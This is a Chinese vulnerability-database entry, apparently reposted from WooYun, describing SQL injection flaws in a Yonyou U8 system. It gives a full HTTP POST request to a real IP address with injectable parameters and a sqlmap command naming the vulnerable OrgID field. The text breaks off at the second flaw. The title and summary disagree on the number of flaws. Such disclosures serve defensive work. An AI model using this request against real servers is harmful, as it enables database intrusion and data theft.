用友优普U8系统三处SQL注射漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友某系统两处SQL注射漏洞 ### 详细说明: 前面有人提交这系统的漏洞 ``` [WooYun: 用友优普U8某系统两处SQL注入(无需登录DBA权限83案例)](http://www.wooyun.org/bugs/wooyun-2015-0119763) ``` 搜索了好久终于找到了案例,于是乎漏洞来了。。。 总共三处漏洞, 0x01 SQL注入一 /Server/CmxUserGroup.php?pgid=Group_DelUserOK UserID=1&OrgID=1 ``` POST /Server/CmxUserGroup.php?pgid=Group_DelUserOK HTTP/1.1 Referer: http://218.27.137.242:8080/ Cookie: RAS_Admin_UserInfo_UserName=1 Host: 218.27.137.242:8080 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 16 UserID=1&OrgID=1 ``` sqlmap.py -r p1.txt -p OrgID --dbms mysql [<img src="https://images.seebug.org/upload/201507/06185322a6ff7d5517ea9a2cbedad3b22d08b4c8.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/06185322a6ff7d5517ea9a2cbedad3b22d08b4c8.png) 0x02 SQL注入二...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息